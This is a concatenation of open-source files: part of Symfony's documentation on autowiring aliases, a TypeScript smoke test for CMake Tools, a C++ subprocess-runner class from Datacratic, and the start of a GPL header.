// ...
}
// ...
}
But now, the type-hint (``App\Util\TransformerInterface``) no longer matches
the id of the service (``App\Util\Rot13Transformer``). This means that the
argument can no longer be autowired.
To fix that, add an :ref:`alias <service-autowiring-alias>`:
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
# ...
App\Util\Rot13Transformer: ~
# the ``App\Util\Rot13Transformer`` service will be injected when
# an ``App\Util\TransformerInterface`` type-hint is detected
App\Util\TransformerInterface: '@App\Util\Rot13Transformer'
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<!-- ... -->
<service id="App\Util\Rot13Transformer"/>
<service id="App\Util\TransformerInterface" alias="App\Util\Rot13Transformer"/>
</services>
</container>
.. code-block:: php
// config/services.php
namespace Symfony\Component\DependencyInjection\Loader\Configurator;
use App\Util\Rot13Transformer;
use App\Util\TransformerInterface;
return function(ContainerConfigurator $configurator) {
// ...
$services->set(Rot13Transformer::class);
// the ``App\Util\Rot13Transformer`` service will be injected when
// an ``App\Util\TransformerInterface`` type-hint is detected
$services->alias(TransformerInterface::class, Rot13Transformer::class);
};
Thanks to the ``App\Util\TransformerInterface`` alias, the autowiring subsystem
knows that the ``App\Util\Rot13Transformer`` service should be injected when
dealing with the ``TransformerInterface``.
.. tip::
When using a `service definition prototype`_, if only one service is
discovered that implements an interface, and that interface is also
discovered in the same file, configuring the alias is not mandatory
and Symfony will automatically create one.
Dealing with Multiple Implementations of the Same Type
------------------------------------------------------
Suppose you create a second class - ``UppercaseTransformer`` that implements
``TransformerInterface``::
namespace App\Util;
class UppercaseTransformer implements TransformerInterface
{
public function transform($value)
{
return strtoupper($value);
}
}
If you register this as a service, you now have *two* services that implement the
``App\Util\TransformerInterface`` type. Autowiring subsystem can not decide
which one to use. Remember, autowiring isn't magic; it looks for a service
whose id matches the type-hint. So you need to choose one by creating an alias
from the type to the correct service id (see :ref:`autowiring-interface-alias`).
Additionally, you can define several named autowiring aliases if you want to use
one implementation in some cases, and another implementation in some
other cases.
For instance, you may want to use the ``Rot13Transformer``
implementation by default when the ``TransformerInterface`` interface is
type hinted, but use the ``UppercaseTransformer`` implementation in some
specific cases. To do so, you can create a normal alias from the
``TransformerInterface`` interface to ``Rot13Transformer``, and then
create a *named autowiring alias* from a special string containing the
interface followed by a variable name matching the one you use when doing
the injection::
namespace App\Service;
use App\Util\TransformerInterface;
class MastodonClient
{
private $transformer;
public function __construct(TransformerInterface $shoutyTransformer)
{
$this->transformer = $shoutyTransformer;
}
public function toot($user, $key, $status)
{
$transformedStatus = $this->transformer->transform($status);
// ... connect to Mastodon and send the transformed status
}
}
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
# ...
App\Util\Rot13Transformer: ~
App\Util\UppercaseTransformer: ~
# the ``App\Util\UppercaseTransformer`` service will be
# injected when an ``App\Util\TransformerInterface``
# type-hint for a ``$shoutyTransformer`` argument is detected.
App\Util\TransformerInterface $shoutyTransformer: '@App\Util\UppercaseTransformer'
# If the argument used for injection does not match, but the
# type-hint still matches, the ``App\Util\Rot13Transformer``
# service will be injected.
App\Util\TransformerInterface: '@App\Util\Rot13Transformer'
App\Service\TwitterClient:
# the Rot13Transformer will be passed as the $transformer argument
autowire: true
# If you wanted to choose the non-default service and do not
# want to use a named autowiring alias, wire it manually:
# $transformer: '@App\Util\UppercaseTransformer'
# ...
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<!-- ... -->
<service id="App\Util\Rot13Transformer"/>
<service id="App\Util\UppercaseTransformer"/>
<service id="App\Util\TransformerInterface" alias="App\Util\Rot13Transformer"/>
<service
id="App\Util\TransformerInterface $shoutyTransformer"
alias="App\Util\UppercaseTransformer"/>
<service id="App\Service\TwitterClient" autowire="true">
<!-- <argument key="$transformer" type="service" id="App\Util\UppercaseTransformer"/> -->
</service>
</services>
</container>
.. code-block:: php
// config/services.php
namespace Symfony\Component\DependencyInjection\Loader\Configurator;
use App\Service\MastodonClient;
use App\Service\TwitterClient;
use App\Util\Rot13Transformer;
use App\Util\TransformerInterface;
use App\Util\UppercaseTransformer;
return function(ContainerConfigurator $configurator) {
// ...
$services->set(Rot13Transformer::class)->autowire();
$services->set(UppercaseTransformer::class)->autowire();
// the ``App\Util\UppercaseTransformer`` service will be
// injected when an ``App\Util\TransformerInterface``
// type-hint for a ``$shoutyTransformer`` argument is detected.
$services->alias(TransformerInterface::class.' $shoutyTransformer', UppercaseTransformer::class);
// If the argument used for injection does not match, but the
// type-hint still matches, the ``App\Util\Rot13Transformer``
// service will be injected.
$services->alias(TransformerInterface::class, Rot13Transformer::class);
$services->set(TwitterClient::class)
// the Rot13Transformer will be passed as the $transformer argument
->autowire()
// If you wanted to choose the non-default service and do not
// want to use a named autowiring alias, wire it manually:
// ->arg('$transformer', service(UppercaseTransformer::class))
// ...
};
Thanks to the ``App\Util\TransformerInterface`` alias, any argument type-hinted
with this interface will be passed the ``App\Util\Rot13Transformer`` service.
If the argument is named ``$shoutyTransformer``,
``App\Util\UppercaseTransformer`` will be used instead.
But, you can also manually wire any *other* service by specifying the argument
under the arguments key.
Fixing Non-Autowireable Arguments
---------------------------------
Autowiring only works when your argument is an *object*. But if you have a scalar
argument (e.g. a string), this cannot be autowired: Symfony will throw a clear
exception.
To fix this, you can :ref:`manually wire the problematic argument <services-manually-wire-args>`.
You wire up the difficult arguments, Symfony takes care of the rest.
.. _autowiring-calls:
Autowiring other Methods (e.g. Setters and Public Typed Properties)
-------------------------------------------------------------------
When autowiring is enabled for a service, you can *also* configure the container
to call methods on your class when it's instantiated. For example, suppose you want
to inject the ``logger`` service, and decide to use setter-injection::
namespace App\Util;
class Rot13Transformer
{
private $logger;
/**
* @required
*/
public function setLogger(LoggerInterface $logger)
{
$this->logger = $logger;
}
public function transform($value)
{
$this->logger->info('Transforming '.$value);
// ...
}
}
Autowiring will automatically call *any* method with the ``@required`` annotation
above it, autowiring each argument. If you need to manually wire some of the arguments
to a method, you can always explicitly :doc:`configure the method call </service_container/calls>`.
Despite property injection has some :ref:`drawbacks <property-injection>`, autowiring with ``@required`` annotation
can also be applied to public typed properties::
namespace App\Util;
class Rot13Transformer
{
/** @required */
public LoggerInterface $logger;
public function transform($value)
{
$this->logger->info('Transforming '.$value);
// ...
}
}
.. versionadded:: 5.1
Public typed properties autowiring was introduced in Symfony 5.1.
Autowiring Controller Action Methods
------------------------------------
If you're using the Symfony Framework, you can also autowire arguments to your controller
action methods. This is a special case for autowiring, which exists for convenience.
See :ref:`controller-accessing-services` for more details.
Performance Consequences
------------------------
Thanks to Symfony's compiled container, there is *no* performance penalty for using
autowiring. However, there is a small performance penalty in the ``dev`` environment,
as the container may be rebuilt more often as you modify classes. If rebuilding
your container is slow (possible on very large projects), you may not be able to
use autowiring.
Public and Reusable Bundles
---------------------------
Public bundles should explicitly configure their services and not rely on autowiring.
Autowiring depends on the services that are available in the container and bundles have
no control over the service container of applications they are included in. You can use
autowiring when building reusable bundles within your company, as you have full control
over all code.
.. _ROT13: https://en.wikipedia.org/wiki/ROT13
.. _service definition prototype: https://symfony.com/blog/new-in-symfony-3-3-psr-4-based-service-discovery
| {
"pile_set_name": "Github"
} |
import {expect} from 'chai';
import * as path from 'path';
import {smokeSuite, smokeTestDefaultKit} from '../smoke';
/**
* This test aims to check what occurs when CTest is not in the same directory
* as the cmake executable
*/
// tslint:disable:no-unused-expression
smokeSuite('no-ctest-in-bindir', suite => {
suite.smokeTest('configure', async ctx => {
return ctx.withCMakeTools({
kit: await smokeTestDefaultKit(),
async run(cmt) {
const cmake_filename = process.platform == 'win32' ? 'cmake.bat' : 'cmake.sh';
cmt.workspaceContext.config.updatePartial({
cmakePath: path.join(ctx.projectDir.uri.fsPath, 'bin', cmake_filename),
});
expect(await cmt.configure()).to.eq(0);
expect(await cmt.build()).to.eq(0);
expect(await cmt.ctest()).to.eq(0);
}
});
});
});
| {
"pile_set_name": "Github"
} |
/* runner.cc -*- C++ -*-
Wolfgang Sourdeau, September 2013
Copyright (c) 2013 Datacratic. All rights reserved.
A command runner class that hides the specifics of the underlying unix
system calls and can intercept input and output.
*/
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <iostream>
#include <utility>
#include "jml/arch/futex.h"
#include "jml/arch/timers.h"
#include "jml/utils/guard.h"
#include "jml/utils/file_functions.h"
#include "logs.h"
#include "message_loop.h"
#include "sink.h"
#include "runner.h"
#include "soa/types/basic_value_descriptions.h"
#include <future>
using namespace std;
using namespace Datacratic;
timevalDescription::
timevalDescription()
{
addField("tv_sec", &timeval::tv_sec, "seconds");
addField("tv_usec", &timeval::tv_usec, "micro seconds", (long)0);
}
rusageDescription::
rusageDescription()
{
addField("utime", &rusage::ru_utime, "user CPU time used");
addField("stime", &rusage::ru_stime, "system CPU time used");
addField("maxrss", &rusage::ru_maxrss, "maximum resident set size", (long)0);
addField("ixrss", &rusage::ru_ixrss, "integral shared memory size", (long)0);
addField("idrss", &rusage::ru_idrss, "integral unshared data size", (long)0);
addField("isrss", &rusage::ru_isrss, "integral unshared stack size", (long)0);
addField("minflt", &rusage::ru_minflt, "page reclaims (soft page faults)", (long)0);
addField("majflt", &rusage::ru_majflt, "page faults (hard page faults)", (long)0);
addField("nswap", &rusage::ru_nswap, "swaps", (long)0);
addField("inblock", &rusage::ru_inblock, "block input operations", (long)0);
addField("oublock", &rusage::ru_oublock, "block output operations", (long)0);
addField("msgsnd", &rusage::ru_msgsnd, "IPC messages sent", (long)0);
addField("msgrcv", &rusage::ru_msgrcv, "IPC messages received", (long)0);
addField("nsignals", &rusage::ru_nsignals, "signals received", (long)0);
addField("nvcsw", &rusage::ru_nvcsw, "voluntary context switches", (long)0);
addField("nivcsw", &rusage::ru_nivcsw, "involuntary context switches", (long)0);
}
namespace {
Logging::Category warnings("Runner::warning");
tuple<int, int>
CreateStdPipe(bool forWriting)
{
int fds[2];
int rc = pipe(fds);
if (rc == -1) {
throw ML::Exception(errno, "CreateStdPipe pipe2");
}
if (forWriting) {
return tuple<int, int>(fds[1], fds[0]);
}
else {
return tuple<int, int>(fds[0], fds[1]);
}
}
} // namespace
namespace Datacratic {
/****************************************************************************/
/* RUNNER */
/****************************************************************************/
std::string Runner::runnerHelper;
Runner::
Runner()
: EpollLoop(nullptr),
closeStdin(false), runRequests_(0), activeRequest_(0), running_(false),
startDate_(Date::negativeInfinity()), endDate_(startDate_),
childPid_(-1), childStdinFd_(-1),
statusRemaining_(sizeof(ProcessStatus))
{
}
Runner::
~Runner()
{
kill(SIGTERM, false);
}
void
Runner::
handleChildStatus(const struct epoll_event & event)
{
ProcessStatus status;
if ((event.events & EPOLLIN) != 0) {
while (1) {
char * current = (statusBuffer_ + sizeof(ProcessStatus)
- statusRemaining_);
ssize_t s = ::read(task_.statusFd, current, statusRemaining_);
if (s == -1) {
if (errno == EWOULDBLOCK) {
break;
}
else if (errno == EBADF || errno == EINVAL) {
/* This happens when the pipe or socket was closed by the
remote process before "read" was called (race
condition). */
break;
}
throw ML::Exception(errno, "Runner::handleChildStatus read");
}
else if (s == 0) {
break;
}
statusRemaining_ -= s;
if (statusRemaining_ > 0) {
continue;
}
memcpy(&status, statusBuffer_, sizeof(status));
// Set up for next message
statusRemaining_ = sizeof(statusBuffer_);
task_.statusState = status.state;
task_.runResult.usage = status.usage;
if (status.launchErrno
|| status.launchErrorCode != LaunchError::NONE) {
// Error
task_.runResult.updateFromLaunchError
(status.launchErrno,
strLaunchError(status.launchErrorCode));
task_.statusState = ProcessState::STOPPED;
}
switch (status.state) {
case ProcessState::LAUNCHING:
childPid_ = status.pid;
break;
case ProcessState::RUNNING:
childPid_ = status.pid;
ML::futex_wake(childPid_);
break;
case ProcessState::STOPPED:
if (task_.runResult.state == RunResult::LAUNCH_ERROR) {
childPid_ = -2;
}
else {
task_.runResult.updateFromStatus(status.childStatus);
childPid_ = -3;
}
ML::futex_wake(childPid_);
task_.statusState = ProcessState::DONE;
if (stdInSink_ && stdInSink_->state != OutputSink::CLOSED) {
stdInSink_->requestClose();
}
attemptTaskTermination();
break;
case ProcessState::DONE:
throw ML::Exception("unexpected status DONE");
case ProcessState::UNKNOWN:
throw ML::Exception("unexpected status UNKNOWN");
}
if (status.launchErrno
|| status.launchErrorCode != LaunchError::NONE)
break;
}
}
if ((event.events & EPOLLHUP) != 0) {
// This happens when the thread that launched the process exits,
// and the child process follows.
removeFd(task_.statusFd, true);
::close(task_.statusFd);
task_.statusFd = -1;
if (task_.statusState == ProcessState::RUNNING
|| task_.statusState == ProcessState::LAUNCHING) {
cerr << "*************************************************************" << endl;
cerr << " HANGUP ON STATUS FD: RUNNER FORK THREAD EXITED?" << endl;
cerr << "*************************************************************" << endl;
cerr << "state = " << jsonEncode(task_.runResult.state) << endl;
cerr << "statusState = " << (int)task_.statusState << endl;
cerr << "childPid_ = " << childPid_ << endl;
// We will never get another event, so we need to clean up
// everything here.
childPid_ = -3;
ML::futex_wake(childPid_);
task_.runResult.state = RunResult::PARENT_EXITED;
task_.runResult.signum = SIGHUP;
task_.statusState = ProcessState::DONE;
if (stdInSink_ && stdInSink_->state != OutputSink::CLOSED) {
stdInSink_->requestClose();
}
attemptTaskTermination();
}
}
}
void
Runner::
handleOutputStatus(const struct epoll_event & event,
int & outputFd, shared_ptr<InputSink> & sink)
{
char buffer[4096];
bool closedFd(false);
string data;
if ((event.events & EPOLLIN) != 0) {
while (1) {
ssize_t len = ::read(outputFd, buffer, sizeof(buffer));
if (len < 0) {
if (errno == EWOULDBLOCK) {
break;
}
else if (errno == EBADF || errno == EINVAL) {
/* This happens when the pipe or socket was closed by the
remote process before "read" was called (race
condition). */
closedFd = true;
break;
}
else {
throw ML::Exception(errno,
"Runner::handleOutputStatus read");
}
}
else if (len == 0) {
closedFd = true;
break;
}
else if (len > 0) {
data.append(buffer, len);
}
}
if (data.size() > 0) {
sink->notifyReceived(move(data));
}
}
if (closedFd || (event.events & EPOLLHUP) != 0) {
ExcAssert(sink != nullptr);
sink->notifyClosed();
sink.reset();
if (outputFd > -1) {
removeFd(outputFd, true);
::close(outputFd);
outputFd = -1;
}
attemptTaskTermination();
}
}
void
Runner::
attemptTaskTermination()
{
/* There is a set of things that occurs spontaneously when a process
exits, due to the way Linux (possibly POSIX) handles processes, file
descriptors, etc. For example, the stdout/stderr channels of a
subprocess are always going to be closed when the relevant process
exits and all the data written by the program will be flushed from the
kernel buffers. Even though this may not occur in order, all of those
events will occur and will be caught by our epoll queue. This is the
basis of how we handle events throughout the Runner class.
For a task to be considered done:
- stdout and stderr must have been closed, provided we redirected them
- the closing child status must have been returned
- stdInSink must either be null or its state considered "closed"
This is a requirement for absolutely *all* conditions: whether the
calls to "fork" and "exec" have succeeded, whether the underlying
program has been successfully run or not. But, although they are
guaranteed to occur, those events do not specifically occur in a
deterministic order.
Since those checks must be performed at various places, the same
conditions must all be checked all the time and the same operations
must be performed when they are all met. This is what
"attemptTaskTermination" does.
*/
if ((!stdInSink_
|| stdInSink_->state == OutputSink::CLOSED
|| stdInSink_->state == OutputSink::CLOSING)
&& !stdOutSink_ && !stdErrSink_ && childPid_ < 0
&& (task_.statusState == ProcessState::STOPPED
|| task_.statusState == ProcessState::DONE)) {
auto runResult = move(task_.runResult);
auto onTerminate = move(task_.onTerminate);
task_.postTerminate(*this);
if (stdInSink_) {
stdInSink_.reset();
}
endDate_ = Date::now();
ExcAssert(onTerminate);
onTerminate(runResult);
/* Setting running_ to false must be done after "onTerminate" is
invoked, since "waitTermination" guarantees that "onTerminate" has
been called. In async mode, doing it here will not be a problem,
since "running_" will be reset to true when the MessageLoop
processes its delayed jobs. */
running_ = false;
ML::futex_wake(running_);
}
/* This block is useful for debugging the termination workflow of the
subprocess, therefore it should be kept 2 years after this date:
2015-07-02. If uncommented, this date should be updated to the current
date. */
else if (false) {
cerr << "cannot terminate yet because:\n";
if ((stdInSink_ && stdInSink_->state != OutputSink::CLOSED)) {
cerr << "stdin sink active\n";
}
if (stdOutSink_) {
cerr << "stdout sink active\n";
}
if (stdErrSink_) {
cerr << "stderr sink active\n";
}
if (childPid_ >= 0) {
cerr << "childPid_ >= 0\n";
}
if (!(task_.statusState == ProcessState::STOPPED
|| task_.statusState == ProcessState::DONE)) {
cerr << "task status != stopped/done\n";
}
}
}
OutputSink &
Runner::
getStdInSink()
{
if (stdInSink_) {
throw ML::Exception("stdin sink already set");
}
ExcAssertEqual(childStdinFd_, -1);
auto onClose = [&] () {
if (task_.stdInFd != -1) {
::close(task_.stdInFd);
task_.stdInFd = -1;
}
removeFd(stdInSink_->selectFd(), true);
if (task_.wrapperPid > -1) {
attemptTaskTermination();
}
};
stdInSink_.reset(new AsyncFdOutputSink(onClose, onClose));
tie(task_.stdInFd, childStdinFd_) = CreateStdPipe(true);
ML::set_file_flag(task_.stdInFd, O_NONBLOCK);
stdInSink_->init(task_.stdInFd);
auto stdinCopy = stdInSink_;
auto stdinCb = [=] (const epoll_event & event) {
stdinCopy->processOne();
};
addFd(stdInSink_->selectFd(), true, false, stdinCb);
return *stdInSink_;
}
void
Runner::
run(const vector<string> & command,
const OnTerminate & onTerminate,
const shared_ptr<InputSink> & stdOutSink,
const shared_ptr<InputSink> & stdErrSink)
{
if (parent_ == nullptr) {
LOG(warnings)
<< ML::format("Runner %p is not connected to any MessageLoop\n", this);
}
if (!onTerminate) {
throw ML::Exception("'onTerminate' parameter is mandatory");
}
ExcAssert(runRequests_ < std::numeric_limits<int>::max());
runRequests_++;
/* We run this in the message loop thread, which becomes the parent of the
child process. This is to avoid problems when the thread we're calling
run from exits, and since it's the parent process of the fork, causes
the subprocess to exit to due to PR_SET_DEATHSIG being set .*/
auto toRun = [=] () {
try {
JML_TRACE_EXCEPTIONS(false);
this->doRunImpl(command, onTerminate, stdOutSink, stdErrSink);
}
catch (const std::exception & exc) {
/* Exceptions must be returned via onTerminate in order to provide
a consistent behaviour when "run" is called from the original
Runner thread or from the MessageLoop thread. "onTerminate" is
mandatory and is thus guaranteed to exist here. */
RunResult result;
result.updateFromLaunchException(std::current_exception());
ExcAssert(onTerminate);
onTerminate(result);
}
catch (...) {
cerr << ("FATAL: Runner::runImpl::toRun caught an unhandled"
" exception. MessageLoop thread will die.\n");
throw;
}
};
ExcAssert(parent_ != nullptr);
bool res = parent_->runInMessageLoopThread(toRun);
ExcAssert(res);
}
RunResult
Runner::
runSync(const vector<string> & command,
const shared_ptr<InputSink> & stdOutSink,
const shared_ptr<InputSink> & stdErrSink,
const string & stdInData)
{
ExcAssert(runRequests_ < std::numeric_limits<int>::max());
runRequests_++;
RunResult result;
bool terminated(false);
auto onTerminate = [&] (const RunResult & newResult) {
result = newResult;
terminated = true;
};
OutputSink * sink(nullptr);
if (stdInData.size() > 0) {
sink = &getStdInSink();
}
doRunImpl(command, onTerminate, stdOutSink, stdErrSink);
if (sink) {
sink->write(stdInData);
sink->requestClose();
}
while (!terminated) {
loop(-1, -1);
}
if (result.state == RunResult::LAUNCH_EXCEPTION) {
std::rethrow_exception(result.launchExc);
}
return result;
}
void
Runner::
doRunImpl(const vector<string> & command,
const OnTerminate & onTerminate,
const shared_ptr<InputSink> & stdOutSink,
const shared_ptr<InputSink> & stdErrSink)
{
/* "activeRequest" must be increased after "running_" is set, in order to
guarantee the continuity between "waitRunning" and "waitTermination".
*/
bool oldRunning(running_);
running_ = true;
ML::futex_wake(running_);
activeRequest_++;
ML::futex_wake(activeRequest_);
if (oldRunning) {
throw ML::Exception("already running");
}
startDate_ = Date::now();
endDate_ = Date::negativeInfinity();
task_.onTerminate = onTerminate;
ProcessFds childFds;
tie(task_.statusFd, childFds.statusFd) = CreateStdPipe(false);
if (stdInSink_) {
ExcAssert(childStdinFd_ != -1);
childFds.stdIn = childStdinFd_;
childStdinFd_ = -1;
}
else if (closeStdin) {
childFds.stdIn = -1;
}
if (stdOutSink) {
stdOutSink_ = stdOutSink;
tie(task_.stdOutFd, childFds.stdOut) = CreateStdPipe(false);
}
if (stdErrSink) {
stdErrSink_ = stdErrSink;
tie(task_.stdErrFd, childFds.stdErr) = CreateStdPipe(false);
}
::flockfile(stdout);
::flockfile(stderr);
::fflush_unlocked(NULL);
task_.wrapperPid = fork();
int savedErrno = errno;
::funlockfile(stderr);
::funlockfile(stdout);
if (task_.wrapperPid == -1) {
throw ML::Exception(savedErrno, "Runner::run fork");
}
else if (task_.wrapperPid == 0) {
try {
task_.runWrapper(command, childFds);
}
catch (...) {
ProcessStatus status;
status.state = ProcessState::STOPPED;
status.setErrorCodes(errno, LaunchError::SUBTASK_LAUNCH);
childFds.writeStatus(status);
exit(-1);
}
}
else {
task_.statusState = ProcessState::LAUNCHING;
ML::set_file_flag(task_.statusFd, O_NONBLOCK);
auto statusCb = [&] (const epoll_event & event) {
handleChildStatus(event);
};
addFd(task_.statusFd, true, false, statusCb);
if (stdOutSink) {
ML::set_file_flag(task_.stdOutFd, O_NONBLOCK);
auto outputCb = [=] (const epoll_event & event) {
handleOutputStatus(event, task_.stdOutFd, stdOutSink_);
};
addFd(task_.stdOutFd, true, false, outputCb);
}
if (stdErrSink) {
ML::set_file_flag(task_.stdErrFd, O_NONBLOCK);
auto outputCb = [=] (const epoll_event & event) {
handleOutputStatus(event, task_.stdErrFd, stdErrSink_);
};
addFd(task_.stdErrFd, true, false, outputCb);
}
childFds.close();
}
}
bool
Runner::
kill(int signum, bool mustSucceed) const
{
if (childPid_ <= 0) {
if (mustSucceed)
throw ML::Exception("subprocess not available");
else return false;
}
::kill(-childPid_, signum);
waitTermination();
return true;
}
bool
Runner::
signal(int signum, bool mustSucceed)
{
if (childPid_ <= 0) {
if (mustSucceed)
throw ML::Exception("subprocess not available");
else return false;
}
::kill(childPid_, signum);
return true;
}
bool
Runner::
waitRunning(double secondsToWait) const
{
bool timeout(false);
Date deadline = Date::now().plusSeconds(secondsToWait);
while (true) {
int currentActive(activeRequest_);
if (currentActive >= runRequests_) {
break;
}
double timeToWait = Date::now().secondsUntil(deadline);
if (isfinite(timeToWait)) {
if (timeToWait < 0) {
timeout = true;
break;
}
ML::futex_wait(activeRequest_, currentActive, timeToWait);
}
else {
ML::futex_wait(activeRequest_, currentActive);
}
}
return !timeout;
}
bool
Runner::
waitStart(double secondsToWait) const
{
Date deadline = Date::now().plusSeconds(secondsToWait);
while (childPid_ == -1) {
double timeToWait = Date::now().secondsUntil(deadline);
if (timeToWait < 0)
break;
if (isfinite(timeToWait))
ML::futex_wait(childPid_, -1, timeToWait);
else ML::futex_wait(childPid_, -1);
}
return childPid_ > 0;
}
void
Runner::
waitTermination() const
{
while (running_) {
ML::futex_wait(running_, true);
}
}
double
Runner::
duration()
const
{
Date end = Date::now();
if (!running_) {
end = endDate_;
}
return (end - startDate_);
}
/* RUNNER::TASK */
Runner::Task::
Task()
: wrapperPid(-1),
stdInFd(-1),
stdOutFd(-1),
stdErrFd(-1),
statusFd(-1),
statusState(ProcessState::UNKNOWN)
{}
void
Runner::Task::
runWrapper(const vector<string> & command, ProcessFds & fds)
{
// Find runner_helper path
string runnerHelper = findRunnerHelper();
vector<string> preArgs = { /*"gdb", "--tty", "/dev/pts/48", "--args"*/ /*"../strace-code/strace", "-b", "execve", "-ftttT", "-o", "runner_helper.strace"*/ };
// Set up the arguments before we fork, as we don't want to call malloc()
// from the fork, and it can be called from c_str() in theory.
auto len = command.size();
char * argv[len + 3 + preArgs.size()];
for (unsigned i = 0; i < preArgs.size(); ++i)
argv[i] = (char *)preArgs[i].c_str();
int idx = preArgs.size();
argv[idx++] = (char *) runnerHelper.c_str();
size_t channelsSize = 4*2*4+3+1;
char channels[channelsSize];
fds.encodeToBuffer(channels, channelsSize);
argv[idx++] = channels;
for (int i = 0; i < len; i++) {
argv[idx++] = (char *) command[i].c_str();
}
argv[idx++] = nullptr;
std::vector<char *> env;
char * const * p = environ;
while (*p) {
env.push_back(*p);
++p;
}
env.push_back(nullptr);
char * const * envp = &env[0];
int res = execve(argv[0], argv, envp);
if (res == -1) {
throw ML::Exception(errno, "launching runner helper");
}
throw ML::Exception("You are the King of Time!");
}
string
Runner::Task::
findRunnerHelper()
{
string runnerHelper = Runner::runnerHelper;
if (runnerHelper.empty()) {
static string staticHelper;
if (staticHelper.empty()) {
string binDir;
char * cBin = ::getenv("BIN");
if (cBin) {
binDir = cBin;
}
if (binDir.empty()) {
char binBuffer[16384];
char * res = ::getcwd(binBuffer, 16384);
ExcAssert(res != NULL);
binDir = res;
binDir += "/" BIN;
}
staticHelper = binDir + "/runner_helper";
// Make sure the deduced path is right
struct stat sb;
int res = ::stat(staticHelper.c_str(), &sb);
if (res != 0) {
throw ML::Exception(errno, "checking static helper");
}
}
runnerHelper = staticHelper;
}
return runnerHelper;
}
/* This method *must* be called from attemptTaskTermination, in order to
* respect the natural order of things. */
void
Runner::Task::
postTerminate(Runner & runner)
{
if (wrapperPid <= 0) {
throw ML::Exception("wrapperPid <= 0, has postTerminate been executed before?");
}
int wrapperPidStatus;
while (true) {
int res = ::waitpid(wrapperPid, &wrapperPidStatus, 0);
if (res == wrapperPid) {
break;
}
else if (res == -1) {
if (errno != EINTR) {
throw ML::Exception(errno, "waitpid");
}
}
else {
throw ML::Exception("waitpid has not returned the wrappedPid");
}
}
wrapperPid = -1;
if (stdInFd != -1) {
runner.removeFd(stdInFd, true);
::close(stdInFd);
stdInFd = -1;
}
auto unregisterFd = [&] (int & fd) {
if (fd > -1) {
JML_TRACE_EXCEPTIONS(false);
try {
runner.removeFd(fd, true);
}
catch (const ML::Exception & exc) {
}
::close(fd);
fd = -1;
}
};
unregisterFd(stdOutFd);
unregisterFd(stdErrFd);
command.clear();
runResult = RunResult();
onTerminate = nullptr;
statusState = ProcessState::UNKNOWN;
}
/* RUNRESULT */
RunResult::
RunResult()
: state(UNKNOWN), signum(-1), returnCode(-1), launchErrno(0)
{
::memset(&usage, 0, sizeof(usage));
}
void
RunResult::
updateFromStatus(int status)
{
if (WIFEXITED(status)) {
state = RETURNED;
returnCode = WEXITSTATUS(status);
}
else if (WIFSIGNALED(status)) {
state = SIGNALED;
signum = WTERMSIG(status);
}
}
int
RunResult::
processStatus()
const
{
int status;
if (state == RETURNED)
status = returnCode;
else if (state == SIGNALED)
status = 128 + signum;
else if (state == LAUNCH_ERROR) {
if (launchErrno == EPERM) {
status = 126;
}
else if (launchErrno == ENOENT) {
status = 127;
}
else {
status = 1;
}
}
else
throw ML::Exception("unhandled state");
return status;
}
void
RunResult::
updateFromLaunchException(const std::exception_ptr & excPtr)
{
state = LAUNCH_EXCEPTION;
launchExc = excPtr;
}
void
RunResult::
updateFromLaunchError(int launchErrno,
const std::string & launchError)
{
this->state = LAUNCH_ERROR;
this->launchErrno = launchErrno;
if (!launchError.empty()) {
this->launchError = launchError;
if (launchErrno)
this->launchError += std::string(": ")
+ strerror(launchErrno);
}
else {
this->launchError = strerror(launchErrno);
}
}
std::string
to_string(const RunResult::State & state)
{
switch (state) {
case RunResult::UNKNOWN: return "UNKNOWN";
case RunResult::LAUNCH_EXCEPTION: return "LAUNCH_EXCEPTION";
case RunResult::LAUNCH_ERROR: return "LAUNCH_ERROR";
case RunResult::RETURNED: return "RETURNED";
case RunResult::SIGNALED: return "SIGNALED";
case RunResult::PARENT_EXITED: return "PARENT_EXITED";
}
return ML::format("RunResult::State(%d)", state);
}
std::ostream &
operator << (std::ostream & stream, const RunResult::State & state)
{
return stream << to_string(state);
}
RunResultDescription::
RunResultDescription()
{
addField("state", &RunResult::state, "State of run command");
addField("signum", &RunResult::signum,
"Signal number that it exited with", -1);
addField("returnCode", &RunResult::returnCode,
"Return code of command", -1);
addField("launchErrno", &RunResult::launchErrno,
"Errno for launch error", 0);
addField("launchError", &RunResult::launchError,
"Error message for launch error");
addField("usage", &RunResult::usage,
"Process statistics as returned by getrusage()");
}
RunResultStateDescription::
RunResultStateDescription()
{
addValue("UNKNOWN", RunResult::UNKNOWN,
"State is unknown or uninitialized");
addValue("LAUNCH_ERROR", RunResult::LAUNCH_ERROR,
"Command was unable to be launched");
addValue("RETURNED", RunResult::RETURNED, "Command returned");
addValue("SIGNALED", RunResult::SIGNALED, "Command exited with a signal");
addValue("PARENT_EXITED", RunResult::PARENT_EXITED, "Parent process exited forcing child to die");
}
/* EXECUTE */
RunResult
execute(MessageLoop & loop,
const vector<string> & command,
const shared_ptr<InputSink> & stdOutSink,
const shared_ptr<InputSink> & stdErrSink,
const string & stdInData,
bool closeStdin)
{
static bool notified(false);
if (!notified) {
cerr << "warning: the \"MessageLoop\"-based \"execute\" function is deprecated\n";
notified = true;
}
return execute(command, stdOutSink, stdErrSink, stdInData, closeStdin);
}
RunResult
execute(const vector<string> & command,
const shared_ptr<InputSink> & stdOutSink,
const shared_ptr<InputSink> & stdErrSink,
const string & stdInData,
bool closeStdin)
{
Runner runner;
runner.closeStdin = closeStdin;
return runner.runSync(command, stdOutSink, stdErrSink, stdInData);
}
} // namespace Datacratic
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2020 Fredrik Öhrström
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
